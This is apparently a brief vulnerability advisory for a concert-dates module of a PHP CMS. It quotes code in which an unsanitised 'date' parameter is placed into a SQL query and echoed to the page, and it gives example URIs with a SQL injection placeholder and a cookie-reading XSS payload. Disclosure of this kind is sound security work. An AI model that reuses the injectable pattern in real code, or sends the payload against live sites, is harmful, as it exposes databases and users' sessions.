==========================
Exploit Code
==========================

// view.php

if (isset($_GET['date'])) {
        $date = $_GET['date'];
}
.
.
.
// SQLi
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184

// XSS

echo " ".switch_date($date, $dateview)." "; // Zeile 176

==========================
Example URIs
==========================

// SQLi (magic_quotes = off)

http://www.example.com/wb/pages/addon.php?date=[SQLi]

// XSS

http://www.example.com/wb/pages/addon.php?date='"><script>alert(document.cookie)</script>

